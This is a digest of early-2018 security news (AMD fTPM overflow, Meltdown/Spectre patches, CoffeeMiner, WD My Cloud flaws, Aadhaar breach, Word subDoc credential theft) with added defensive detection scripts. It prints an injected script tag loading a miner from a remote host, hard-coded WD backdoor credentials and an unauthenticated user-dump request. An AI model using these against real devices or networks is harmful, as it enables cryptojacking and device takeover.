A Google expert discovered a new stack-based overflow vulnerability in AMD CPUs that could be exploited via crafted EK certificates.
Chip manufacturers are in the eye of the storm: while the media continue to report on the Meltdown and Spectre attacks, security researcher Cfir Cohen of Google’s cloud security team disclosed a stack-based overflow vulnerability in the fTPM of AMD’s Platform Security Processor (PSP).

The vulnerability affects 64-bit x86 processors; the AMD PSP provides administrative functions similar to the Intel Management Engine.

The fTPM is the firmware implementation of the Trusted Platform Module, an international standard for a secure cryptoprocessor. The TPM is a dedicated microcontroller designed to secure hardware by integrating cryptographic keys into devices.

Cohen revealed that he reported the vulnerability to AMD in September; the manufacturer apparently had developed a patch by December 7. After the 90-day disclosure window expired, Google decided to publicly disclose the details of the vulnerability because AMD had not taken any action to solve the problem.

“Through manual static analysis, we’ve found a stack-based overflow in the function EkCheckCurrentCert. This function is called from TPM2_CreatePrimary with user controlled data – a DER encoded [6] endorsement key (EK) certificate stored in the NV storage. A TLV (type-length-value) structure is parsed and copied on to the parent stack frame. Unfortunately, there are missing bounds checks, and a specially crafted certificate can lead to a stack overflow:” reads the security advisory.

“A firmware update emerged for some AMD chips in mid-December, with an option to at least partially disable the PSP. However, a spokesperson for the tech giant said on Friday this week that the above fTPM issue will be addressed in an update due out this month, January 2018.”

Cohen explained that missing bounds checks while parsing a TLV (type-length-value) structure are the root cause of the stack overflow.

The vulnerability requires physical access as a prerequisite; the expert noted that the PSP doesn’t implement common exploit mitigation techniques such as stack cookies, a No-eXecute stack, or ASLR.
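To make the bug class concrete, here is an added example (not AMD's fTPM code, and not Cohen's advisory) of a minimal DER TLV parser that copies a value into a fixed-size buffer on the caller's stack frame. It includes the two bounds checks the advisory says were missing, labelled CHECK 1 and CHECK 2, and feeds it constructed blobs that are not real EK certificates; the 64-byte buffer size and all function names are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed capacity of the caller's stack buffer (hypothetical value). */
#define EK_VALUE_MAX 64

typedef struct {
    uint8_t tag;           /* DER tag byte, e.g. 0x30 for SEQUENCE */
    size_t len;            /* declared value length */
    const uint8_t *value;  /* start of the value inside the input buffer */
} tlv_t;

/* Parse one DER TLV header from in[0..in_len). Returns 0 on success, -1 if the
 * header is truncated, uses an indefinite or >2-byte length form, or declares
 * more value bytes than the input actually contains. */
int tlv_parse(const uint8_t *in, size_t in_len, tlv_t *out)
{
    size_t pos = 0;
    if (in == NULL || out == NULL || in_len < 2)
        return -1;
    out->tag = in[pos++];
    uint8_t first = in[pos++];
    if (first < 0x80) {                 /* short form: the byte is the length */
        out->len = first;
    } else {                            /* long form: low 7 bits = #length bytes */
        size_t nbytes = first & 0x7f;
        if (nbytes == 0 || nbytes > 2)  /* indefinite length or > 65535: reject */
            return -1;
        if (in_len - pos < nbytes)      /* the length bytes themselves are missing */
            return -1;
        size_t len = 0;
        for (size_t i = 0; i < nbytes; i++)
            len = (len << 8) | in[pos++];
        out->len = len;
    }
    /* CHECK 1: the declared length must fit inside the supplied input. Without
     * it, a crafted header makes the copy read past the certificate blob. */
    if (out->len > in_len - pos)
        return -1;
    out->value = in + pos;
    return 0;
}

/* Copy a parsed value into a fixed-size destination. Returns the number of
 * bytes copied, or -1 if the value would not fit. */
int tlv_copy_value(const tlv_t *t, uint8_t *dst, size_t dst_cap)
{
    if (t == NULL || dst == NULL)
        return -1;
    /* CHECK 2: the declared length must not exceed the destination capacity.
     * Without it, a crafted length writes past the stack buffer: the overflow. */
    if (t->len > dst_cap)
        return -1;
    memcpy(dst, t->value, t->len);
    return (int)t->len;
}

/* Mirrors the call pattern on the page: a caller owning a stack buffer hands a
 * stored certificate blob to the parser. Returns bytes copied or -1. */
int ek_check_cert(const uint8_t *cert, size_t cert_len)
{
    uint8_t frame_buf[EK_VALUE_MAX];  /* the parent stack frame's buffer */
    tlv_t t;
    if (tlv_parse(cert, cert_len, &t) != 0)
        return -1;
    return tlv_copy_value(&t, frame_buf, sizeof frame_buf);
}

/* Constructed inputs; none is a real EK certificate. */

/* Well-formed: SEQUENCE, short-form length 3, three value bytes follow. */
int demo_well_formed(void)
{
    static const uint8_t cert[] = { 0x30, 0x03, 0x02, 0x01, 0x05 };
    return ek_check_cert(cert, sizeof cert);  /* 3 */
}

/* Crafted: long-form length claims 0x1000 bytes but only two follow. */
int demo_truncated(void)
{
    static const uint8_t cert[] = { 0x30, 0x82, 0x10, 0x00, 0xAA, 0xBB };
    return ek_check_cert(cert, sizeof cert);  /* -1, rejected by CHECK 1 */
}

/* Crafted: length 80 matches the input but exceeds the 64-byte stack buffer;
 * this is the case an unchecked copy would overflow on. */
int demo_oversized_value(void)
{
    uint8_t cert[3 + 80];
    cert[0] = 0x30; cert[1] = 0x81; cert[2] = 0x50;   /* long form, 1 byte, 80 */
    memset(cert + 3, 0x41, 80);
    return ek_check_cert(cert, sizeof cert);  /* -1, rejected by CHECK 2 */
}
```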


The flaw is very hard to exploit, as confirmed by an AMD spokesperson to The Register.

“An attacker would first have to gain access to the motherboard and then modify SPI-Flash before the issue could be exploited. But given those conditions, the attacker would have access to the information protected by the TPM, such as cryptographic keys.” said the AMD spokesperson.

AMD plans to address the vulnerability for a limited number of firmware versions; the security updates will be available later this month.


Cisco is going to release security patches for Meltdown and Spectre attacks
7.1.2018 securityaffairs
Vulnerability

Cisco is going to release security patches for Meltdown and Spectre attacks, the company is currently investigating its entire products portfolio.
Cisco published a security advisory on the CPU side-channel information disclosure vulnerabilities exploited in the Spectre and Meltdown attacks and announced that it will release security updates to protect its customers.

Switchzilla announced it will release software updates that address these flaws.

In a statement, Cisco highlighted that the majority of its products are closed systems, which means that an attacker cannot run custom code on the device. However, the company confirmed that the underlying CPU and OS combination in some products could expose the devices to the attacks.

“The first two vulnerabilities, CVE-2017-5753 and CVE-2017-5715, are collectively known as Spectre, the third vulnerability, CVE-2017-5754, is known as Meltdown. The vulnerabilities are all variants of the same attack and differ in the way the speculative execution is exploited.” reads the advisory published by Cisco.
“In order to exploit any of these vulnerabilities, an attacker must be able to run crafted code on an affected device. Although, the underlying CPU and OS combination in a product may be affected by these vulnerabilities, the majority of Cisco products are closed systems that do not allow customers to run custom code on the device, and thus are not vulnerable.”

According to Cisco, only devices that allow customers to execute their own code side-by-side with the Cisco code on the same microprocessor are at risk.

Consider, for example, a Cisco product running in a virtualized environment: if the hosting virtual machine is vulnerable, the overall system is exposed to the attacks.

“A Cisco product that may be deployed as a virtual machine or a container, even while not being directly affected by any of these vulnerabilities, could be targeted by such attacks if the hosting environment is vulnerable.” continues the advisory.

“Cisco recommends customers harden their virtual environment and to ensure that all security updates are installed.”

The company is currently investigating its product portfolio searching for vulnerable devices.


CoffeeMiner – Hacking WiFi networks to mine cryptocurrencies
7.1.2018 securityaffairs Hacking

A developer published a proof-of-concept project dubbed CoffeeMiner for hacking public Wi-Fi networks and mine cryptocurrencies.
The spike in the values of Bitcoin is attracting the interest of crooks that are adopting any method to steal crypto wallets or computational resources from the victims.

A developer named Arnau has published a proof-of-concept project dubbed CoffeeMiner for hacking public Wi-Fi networks to inject crypto-mining code into connected browsing sessions, an ingenious method to rapidly monetize illegal efforts.

The expert explained that his project was inspired by the Starbucks case, where hackers hijacked laptops connected to the Wi-Fi network to use the devices’ computing power to mine cryptocurrency.

Arnau explained how to mount a MITM (Man-in-the-Middle) attack to inject JavaScript into the HTML pages accessed by the connected users; in this way, all the devices connected to a Wi-Fi network are forced to mine a cryptocurrency.

CoffeeMiner works by spoofing Address Resolution Protocol (ARP) messages on a local area network in order to intercept unencrypted traffic from other devices on the network.

The MITM attack is conducted using software called mitmproxy, which allows injecting the following line of HTML code into the unencrypted content requested by other users on the network:

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>
“mitmproxy is a software tool that allows us to analyze the traffic that goes through a host, and allows to edit that traffic. In our case, we will use it to inject the javascript into the html pages.” wrote Arnau.

“To make the process more clean, we will only inject one line of code into the html pages. And will be that line of html code that will call to the javascript cryptocurrency miner.”

When the user’s browser loads a page with the injected code, it runs the JavaScript and abuses CPU time to generate Monero using CoinHive’s crypto-mining software.

Arnau set up a VirtualBox machine to demonstrate the attack and also published a couple of PoC videos showing the attack in a virtualized environment and on a real-world Wi-Fi network.

The CoffeeMiner version published by the researcher doesn’t work with HTTPS, but this limitation could be bypassed by adding sslstrip.

“Another further feature, could be adding sslstrip, to make sure the injection also in the websites that the user can request over HTTPS.” concluded the researcher.

Arnau published the code of the CoffeeMiner project on GitHub.
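Two defender-side checks for the technique described above, written as an added example (this is not Arnau's CoffeeMiner code): the first flags an IP address that starts answering ARP with a different MAC than the one first learned for it (the gateway is the usual target of the spoofing), and the second flags `<script src=...>` tags in an HTML body that point at a host other than the page's own or an allow-listed one. All sample ARP replies and HTML below are constructed.

```python
"""ARP-spoof and injected-script detection for the CoffeeMiner scenario."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed ARP replies as (sender_ip, sender_mac), in arrival order.
ARP_REPLIES = [
    ("192.168.1.1", "aa:bb:cc:00:00:01"),   # legitimate gateway
    ("192.168.1.20", "aa:bb:cc:00:00:20"),  # ordinary client
    ("192.168.1.1", "aa:bb:cc:00:00:99"),   # same IP, new MAC: spoofed reply
    ("192.168.1.1", "aa:bb:cc:00:00:99"),   # repeated, still one conflict
]


def find_arp_conflicts(replies):
    """Return {ip: [mac, ...]} for every IP that was seen with more than one MAC.

    A legitimate host keeps one MAC; an attacker poisoning caches on behalf
    of the gateway produces a second MAC for the gateway's IP.
    """
    seen = defaultdict(list)
    for ip, mac in replies:
        mac = mac.lower()
        if mac not in seen[ip]:
            seen[ip].append(mac)
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}


# Matches the src attribute of a <script> tag, quoted with " or '.
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)


def find_foreign_scripts(html, page_url, allowed_hosts=()):
    """Return the src URLs of script tags served from a host other than the page's.

    Relative paths are same-origin and ignored; hosts in allowed_hosts
    (e.g. a known CDN) are ignored too. Anything else, such as the
    "http://<injector IP>:8000/script.js" line CoffeeMiner injects, is returned.
    """
    page_host = urlsplit(page_url).hostname
    foreign = []
    for src in SCRIPT_SRC.findall(html):
        host = urlsplit(src).hostname
        if host is None:  # relative path: same origin as the page
            continue
        if host != page_host and host not in allowed_hosts:
            foreign.append(src)
    return foreign


# Constructed HTML body as it would arrive after injection (192.168.1.99 is
# the hypothetical host running the injected miner's web server).
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script src="http://192.168.1.99:8000/script.js" type="text/javascript"></script>
</head><body>hello</body></html>"""

if __name__ == "__main__":
    print(find_arp_conflicts(ARP_REPLIES))
    print(find_foreign_scripts(SAMPLE_HTML, "http://news.example.com/index.html",
                               allowed_hosts={"cdn.example.net"}))
```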


Critical Unpatched Flaws Disclosed In Western Digital 'My Cloud' Storage Devices
6.1.2018 thehackernews
Vulnerability

Security researchers have discovered several severe vulnerabilities and a secret hard-coded backdoor in Western Digital's My Cloud NAS devices that could allow remote attackers to gain unrestricted root access to the device.
Western Digital's My Cloud (WDMyCloud) is one of the most popular network-attached storage devices, used by individuals and businesses to host their files and to automatically back them up and sync them with various cloud and web-based services.
The device lets users not only share files in a home network, but the private cloud feature also allows them to access their data from anywhere at any time.
Since these devices are designed to be connected to the Internet, the hard-coded backdoor leaves user data open to hackers.
The GulfTech research and development team recently published an advisory detailing a hard-coded backdoor and several vulnerabilities it found in WD My Cloud storage devices that could allow remote attackers to inject their own commands and to upload and download sensitive files without permission.
Notably, James Bercegay of GulfTech contacted the vendor and reported the issues in June last year. The vendor confirmed the vulnerabilities and requested a period of 90 days until full disclosure.
On 3 January (almost 180 days later), GulfTech publicly disclosed the details of the vulnerabilities, which are still unpatched.
Unrestricted File Upload Flaw Leads to Remote Exploitation
As the name suggests, this vulnerability allows a remote attacker to upload an arbitrary file to the server running on the Internet-connected vulnerable storage devices.
The vulnerability resides in the "multi_uploadify.php" script and stems from the developers' incorrect use of the PHP gethostbyaddr() function.
This vulnerability can also be easily exploited to gain a remote shell as root: all an attacker has to do is send a POST request containing a file to upload via the Filedata[0] parameter, a destination for the file specified in the "folder" parameter, and a fake "Host" header.
The researcher has also written a Metasploit module to exploit this vulnerability.
"The [metasploit] module will use this vulnerability to upload a PHP webshell to the "/var/www/" directory. Once uploaded, the webshell can be executed by requesting a URI pointing to the backdoor, and thus triggering the payload," the researcher writes.
Hard Coded Backdoor Leads to Remote Exploitation
Researchers also found a "classic backdoor": the admin username "mydlinkBRionyg" and password "abc12345cba" are hard-coded into the binary and cannot be changed.
So, anyone can just log into WD My Cloud devices with these credentials.
Also, using this backdoor access, anyone can reach the buggy code that is vulnerable to command injection and spawn a root shell.
"The triviality of exploiting these issues makes it very dangerous, and even wormable," the researcher notes. "Not only that, but users locked to a LAN are not safe either."
"An attacker could literally take over your WDMyCloud by just having you visit a website where an embedded iframe or img tag makes a request to the vulnerable device using one of the many predictable default hostnames for the WDMyCloud such as 'wdmycloud' and 'wdmycloudmirror' etc."
Other Vulnerabilities in Western Digital's My Cloud
Besides the two critical vulnerabilities above, researchers also reported the following important flaws:
Cross-site request forgery:
Due to no real XSRF protection within the WD My Cloud web interface, any malicious site can potentially make a victim's web browser connect to a My Cloud device on the network and compromise it.
Simply visiting a booby-trapped website would be enough to lose control of your My Cloud device.
Command injection:
In March last year, a member of the Exploitee.rs team discovered several command injection issues within the WD My Cloud devices, which can be combined with the XSRF flaw to gain complete control (root access) of the affected device.
Unfortunately, the GulfTech team also uncovered a few additional command injection flaws.
Denial of Service:
Researchers also found that, since any unauthenticated user can set the global language preferences for the entire storage device and all of its users, an attacker can abuse this functionality to cause a DoS condition in the web interface.
Information disclosure:
According to researchers, an attacker can dump a list of all users, including detailed user information, without any authentication, simply by sending a request to the web server such as: GET /api/2.1/rest/users? HTTP/1.1
Affected My Cloud Firmware Versions and Models
Western Digital's My Cloud and My Cloud Mirror firmware version 2.30.165 and earlier are affected by all above-reported vulnerabilities.
Affected device models include My Cloud Gen 2, My Cloud PR2100, My Cloud PR4100, My Cloud EX2 Ultra, My Cloud EX2, My Cloud EX4, My Cloud EX2100, My Cloud EX4100, My Cloud DL2100 and My Cloud DL4100.
Metasploit modules for all the vulnerabilities have been released online.
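A small access-log triage for the issues above, written as an added example (it is not GulfTech's code or a Western Digital tool). It applies three indicators taken from the advisory to constructed Apache-style log lines: a POST to multi_uploadify.php (the unrestricted upload), a request to /api/2.1/rest/users (the unauthenticated user listing), and a request for a top-level .php file that is not part of the known web root (a dropped webshell under /var/www/ being invoked). The directory prefix of multi_uploadify.php in the sample line and the KNOWN_PHP allow-list are assumptions for the example, not values from the advisory.

```python
"""Flag WD My Cloud exploitation indicators in web-server access logs."""
import re
from collections import defaultdict

# Apache/nginx combined log format (constructed lines below follow it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Hypothetical allow-list of PHP entry points legitimately served from the web root.
KNOWN_PHP = {"/index.php", "/login.php"}

# (rule name, required HTTP method or None, regex over the request path)
RULES = [
    ("upload-endpoint", "POST", re.compile(r"/multi_uploadify\.php", re.I)),
    ("user-enumeration", "GET", re.compile(r"^/api/2\.1/rest/users\b", re.I)),
    ("unexpected-php", None, re.compile(r"^/[^/?]+\.php(\?|$)", re.I)),
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_rules(entry):
    """Return the names of all rules a parsed log entry triggers."""
    hits = []
    for name, method, path_re in RULES:
        if method and entry["method"] != method:
            continue
        if not path_re.search(entry["path"]):
            continue
        # A known PHP page under the web root is expected traffic, not a webshell.
        if name == "unexpected-php" and entry["path"].split("?")[0] in KNOWN_PHP:
            continue
        hits.append(name)
    return hits


def triage(lines):
    """Return {client_ip: [(timestamp, path, rule), ...]} for every flagged request."""
    findings = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for rule in match_rules(entry):
            findings[entry["ip"]].append((entry["ts"], entry["path"], rule))
    return dict(findings)


# Constructed sample: one client walks through enumeration, upload and webshell
# invocation; a LAN client requests an ordinary page.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jan/2018:10:00:01 +0000] "GET /api/2.1/rest/users? HTTP/1.1" 200 5120',
    '203.0.113.7 - - [03/Jan/2018:10:00:09 +0000] "POST /uploader/multi_uploadify.php?folder=/var/www/ HTTP/1.1" 200 45',
    '203.0.113.7 - - [03/Jan/2018:10:00:12 +0000] "GET /x.php HTTP/1.1" 200 88',
    '192.168.1.5 - - [03/Jan/2018:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, events in triage(SAMPLE_LOG).items():
        for ts, path, rule in events:
            print(f"{ip} {ts} {rule}: {path}")
```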


Data breach of the Aadhaar biometric system poses a serious risk for 1 Billion Indian residents
6.1.2018 securityaffairs Incident

The Tribune announced to have “purchased” a service that provided it an unrestricted access to the residents’ records in the Aadhaar system.
According to The Tribune, hackers have breached the Unique Identification Authority of India’s Aadhaar biometric system and gained access to personally identifiable information (i.e. names, addresses, phone numbers) of more than 1 billion Indian residents.
The Tribune announced to have “purchased” a service being offered by anonymous sellers over WhatsApp that provided it an unrestricted access to details for any individual whose data are stored in the Aadhaar system.
The attackers offered a portal to access Indian citizens’ data by Aadhaar ID number. The service allowed the journalist to retrieve a resident’s name, address, postal code, photo, phone number, and email address by providing the Aadhaar ID.

The hackers are offering access to the portal for 500 rupees and charge an additional 300 rupees for an application that allows printing an Aadhaar card.

“Today, The Tribune “purchased” a service being offered by anonymous sellers over WhatsApp that provided unrestricted access to details for any of the more than 1 billion Aadhaar numbers created in India thus far.” states The Tribune.

“It took just Rs 500, paid through Paytm, and 10 minutes in which an “agent” of the group running the racket created a “gateway” for this correspondent and gave a login ID and password. Lo and behold, you could enter any Aadhaar number in the portal, and instantly get all particulars that an individual may have submitted to the UIDAI (Unique Identification Authority of India), including name, address, postal code (PIN), photo, phone number and email.”

The Unique Identification Authority of India denies that the Aadhaar system has been breached, but The Tribune revealed that, when contacted, UIDAI officials in Chandigarh expressed shock that the full data could be accessed, and admitted it seemed to be a major national security breach.

“Except the Director-General and I, no third person in Punjab should have a login access to our official portal. Anyone else having access is illegal, and is a major national security breach.” Sanjay Jindal, Additional Director-General, UIDAI Regional Centre, Chandigarh told The Tribune.


According to The Tribune’s investigation, the breach could have involved the more than one lakh village-level enterprise (VLE) operators hired by the Ministry of Electronics and Information Technology (ME&IT) under the Common Service Centres Scheme (CSCS) across India, who were given access to UIDAI data.

CSCS operators were initially tasked with making Aadhaar cards across India, but later this function was restricted to post offices and designated banks.

More than one lakh VLEs are now suspected to have gained this illegal access to UIDAI data to provide “Aadhaar services” to common people for a charge, including the printing of Aadhaar cards.


Intel releases patches to mitigate Meltdown and Spectre attacks
6.1.2018 securityaffairs
Vulnerability

Meltdown and Spectre attacks – According to Intel, by the end of the next week, the company will have issued security patches for more than 90% of chips commercialized in the past 5 years.
White hat hackers from Google Project Zero this week disclosed the details of Meltdown and Spectre attacks targeting CPUs from major manufacturers, including Intel, AMD, and ARM.

The experts devised two attacks, dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be used to access sensitive data processed by the CPU.

Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.

To protect systems from both Meltdown and Spectre attacks, it is possible to implement the hardening technique known as kernel page table isolation (KPTI), which isolates kernel-space memory from user-space memory.

Intel confirmed that system manufacturers have been provided firmware and software updates that neutralize both Meltdown and Spectre attacks for chips launched in the last five years.

Customers must wait for system manufacturers to distribute the security patches for their affected products.

According to Intel, by the end of the next week, the company will have issued security patches for more than 90% of chips commercialized in the past 5 years.

“Intel has developed and is rapidly issuing updates for all types of Intel-based computer systems — including personal computers and servers — that render those systems immune from both exploits (referred to as “Spectre” and “Meltdown”) reported by Google Project Zero.” reads the press release published by Intel.

“Intel has already issued updates for the majority of processor products introduced within the past five years. By the end of next week, Intel expects to have issued updates for more than 90 percent of processor products introduced within the past five years.”


Experts speculate that the security patches could have a significant effect on the performance of the affected products, but Intel maintains that average users will not notice any difference.

“Intel continues to believe that the performance impact of these updates is highly workload-dependent and, for the average computer user, should not be significant and will be mitigated over time.” continues Intel.

“While on some discrete workloads the performance impact from the software updates may initially be higher, additional post-deployment identification, testing and improvement of the software updates should mitigate that impact.”

Intel added that extensive testing conducted by tech giants (Apple, Amazon, Google, and Microsoft) to assess the impact of the security updates on system performance did not reveal negative effects.

Researchers from Google Project Zero proposed a mitigation technique named Retpoline.

“In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” — a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.” wrote Google.
“In addition, we have deployed Kernel Page Table Isolation (KPTI) — a general purpose technique for better protecting sensitive information in memory from other software running on a machine — to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.”
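Both the Cisco advisory and the Intel article above come down to the same practical question for a defender: does a given host actually carry the KPTI and Retpoline mitigations yet? The script below, an added example that is not from Intel, Cisco or Google, reads the per-issue status files that Linux (4.15 and later) exposes under /sys/devices/system/cpu/vulnerabilities, classifies each as not affected, mitigated or vulnerable, and notes whether the kernel reports PTI for Meltdown and a retpoline for Spectre variant 2. The interpretation of the kernel's status strings is an assumption based on the kernel's reporting format, not something the articles state; the dictionary of statuses in the `__main__` block is constructed for the example.

```python
"""Report Meltdown/Spectre mitigation status from Linux sysfs."""
import os

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"

# sysfs file name -> CVE, as listed in the Cisco advisory above.
ISSUES = {
    "meltdown": "CVE-2017-5754",
    "spectre_v1": "CVE-2017-5753",
    "spectre_v2": "CVE-2017-5715",
}


def classify(status):
    """Map one status line ("Not affected", "Vulnerable...", "Mitigation: ...")
    to 'not_affected', 'mitigated' or 'vulnerable'."""
    s = status.strip()
    if s.startswith("Not affected"):
        return "not_affected"
    if s.startswith("Mitigation:"):
        return "mitigated"
    return "vulnerable"  # "Vulnerable", "Vulnerable: <partial measure>", or unknown text


def assess(statuses):
    """statuses: {issue: status_line}. Returns per-issue findings plus a
    'needs_action' list of issues still vulnerable or not reported at all."""
    report = {}
    for issue, cve in ISSUES.items():
        line = statuses.get(issue)
        if line is None:  # kernel older than 4.15 or unsupported arch: cannot tell
            report[issue] = {"cve": cve, "state": "unknown", "detail": "no sysfs entry"}
            continue
        detail = line.strip()
        report[issue] = {"cve": cve, "state": classify(detail), "detail": detail}
    # The two mitigations the articles discuss, as the kernel names them.
    report["kpti"] = "PTI" in report["meltdown"]["detail"]
    report["retpoline"] = "retpoline" in report["spectre_v2"]["detail"].lower()
    report["needs_action"] = sorted(
        i for i in ISSUES if report[i]["state"] in ("vulnerable", "unknown")
    )
    return report


def read_sysfs(path=SYSFS_DIR):
    """Collect the status files that exist; missing files are simply absent."""
    statuses = {}
    for issue in ISSUES:
        p = os.path.join(path, issue)
        if os.path.isfile(p):
            with open(p) as f:
                statuses[issue] = f.read()
    return statuses


if __name__ == "__main__":
    live = read_sysfs()
    if not live:
        # Constructed sample for a host without the sysfs interface.
        live = {
            "meltdown": "Mitigation: PTI\n",
            "spectre_v1": "Mitigation: __user pointer sanitization\n",
            "spectre_v2": "Vulnerable: Minimal generic ASM retpoline\n",
        }
    for key, value in assess(live).items():
        print(f"{key}: {value}")
```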


Microsoft Word subDoc Feature Allows Password Theft
5.1.2018 securityweek Hacking
A feature in Microsoft Word that allows for the loading of sub-documents from a master document can be abused by attackers to steal a user’s credentials, according to Rhino Security Labs.

Dubbed subDoc, the feature was designed to load a document into the body of another document, so as to include information from one document into the other, while also allowing for the information to be edited and viewed on its own.

According to Rhino Security, the feature can also be used to load remote (Internet-hosted) subDoc files into the host document, thus allowing for malicious abuse in certain situations.

The feature, Rhino's researchers explain, is similar to attachedTemplate, another Office feature that can be abused by attackers for malicious purposes. The method allows the creation of malicious documents that would open an authentication prompt in the Windows style once the intended victim opens them, thus enabling the attacker to harvest credentials remotely.

“We determined, after testing in our sandbox environment, that abusing the subDoc method would allow us to do the same thing as the attachedTemplate method,” Rhino Security’s Hector Monsegur explains.

The researcher also points out that some organizations do not filter egress SMB requests, meaning that they would leak the NTLMv2 (session protocol) hash in the initial SMB request.

To exploit the feature, Rhino Security created a document that opens a subDoc external resource via a Universal Naming Convention (UNC) path (a way of addressing servers and workstations without specifying a drive letter) pointing to a destination they control.

This allowed them to run Responder to listen for incoming SMB requests and collect the NTLMv2 hashes. Available on GitHub, Responder is an LLMNR, NBT-NS and mDNS poisoner designed to answer File Server Service requests (that is, SMB) while remaining stealthy on the network.

“The attack process for this would be to send a tainted document out to several targets while running Responder server on associated C&C server. After targets open the document, we intercept the respective hashes, crack them using hashcat and use our newly found credentials for lateral movement across the target network,” Monsegur explains.

When the document is opened, subDoc automatically attempts to load the remote resource and presents the user with a link in place of the would-be document. However, user interaction with the link is not required for the payload to execute, the researcher says. The link can also be hidden from the user, so that they would not notice the malicious intent.

The attack, the researcher points out, is not detected by popular anti-virus products, mainly because the subDoc feature has not been publicly recognized as an attack vector.

The security researcher also published an open source tool designed to generate a Word subDoc for a user-defined URL and also to integrate it into a user-specified ‘parent’ Word doc. Dubbed Subdoc Injector, the tool is available on GitHub.

“Office has a myriad of loosely-documented features that have yet to be explored. As more research goes into these functions, more vulnerabilities and abusable functions will likely be discovered, making the situation difficult for defenders to protect their systems,” Monsegur notes.
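A detection-side counterpart to the technique described above, written as an added example (it is not Rhino Security Labs' Subdoc Injector nor Microsoft tooling). A .docx is a zip of XML parts, and the link behind a subDoc or attachedTemplate lives in a `.rels` part as a `<Relationship>` whose Type ends in `/subDocument` or `/attachedTemplate`; the scanner flags any such relationship whose Target is a UNC path or an http(s) URL, which is exactly what produces the outbound SMB request. The minimal document built in memory by `_fixture_docx` is constructed for the example only, with a TEST-NET address as its target.

```python
"""Flag external subDoc / attachedTemplate references inside a .docx."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
SUSPECT_TYPES = ("/subDocument", "/attachedTemplate")


def is_remote_target(target):
    """True for UNC paths (\\\\host\\share) and http(s) URLs, with or without a file: prefix."""
    t = target.strip().lower()
    if t.startswith("file:"):
        t = t[5:].lstrip("/")
    return t.startswith(("\\\\", "//", "http://", "https://"))


def scan_docx(data):
    """Return [(rels_part, relationship_kind, target)] for every subDoc or
    attachedTemplate relationship pointing at a remote host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue  # only relationship parts carry link targets
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                if rtype.endswith(SUSPECT_TYPES) and is_remote_target(target):
                    findings.append((name, rtype.rsplit("/", 1)[-1], target))
    return findings


def _fixture_docx(target):
    """Constructed minimal .docx whose body holds one subDoc referencing `target`."""
    doc_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        f'xmlns:r="{OFFICE_REL}">'
        '<w:body><w:p><w:subDoc r:id="rId9"/></w:p></w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId9" Type="{OFFICE_REL}/subDocument" '
        f'Target="{target}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", doc_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # 203.0.113.5 is a documentation-range address standing in for a listener host.
    print(scan_docx(_fixture_docx("\\\\203.0.113.5\\share\\sub.docx")))
    print(scan_docx(_fixture_docx("chapter2.docx")))  # local sub-document: not flagged
```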


Industrial Firms Increasingly Hit With Targeted Attacks: Survey
5.1.2018 securityweek
Attack
An increasing number of companies in the industrial sector have experienced a targeted attack, according to a survey conducted by Kaspersky Lab and B2B International.

As part of its 2017 IT Security Risks Survey, Kaspersky talked to more than 5,200 representatives of small, medium and large businesses in 29 countries about IT security and the incidents they deal with.

Of the 962 industrial companies surveyed, 28% said they had faced a targeted attack in the last 12 months. This represents an 8 percentage point increase compared to the previous year.

“The fact that the most dangerous incident type has grown by more than a third strongly suggests that cybercriminal groups are paying much closer attention to the industrial sector,” Kaspersky said.

More than half of the industrial organizations surveyed by Kaspersky reported being hit by malware attacks in the last year.


A majority of industrial sector respondents claimed that the security incidents they experienced were complex, and nearly half admitted that there is insufficient insight into the threats they face.

Roughly one-third of companies reported that it had taken them several days to detect an incident, while 20% said it had taken them several weeks.

While 62% believe sophisticated security software is necessary to address potential threats, almost half of respondents also noted that staff has not followed IT security policies. The number of people who blamed staff in the industrial sector is 6% higher compared to other sectors that took part in Kaspersky’s survey.

“Cyberattacks on industrial control systems have become the indisputable number-one concern. The good news is that the majority of industrial market players know which threats are coming to the fore today and will be relevant in the near future,” explained Andrey Suvorov, Head of Critical Infrastructure Protection Business Development at Kaspersky.

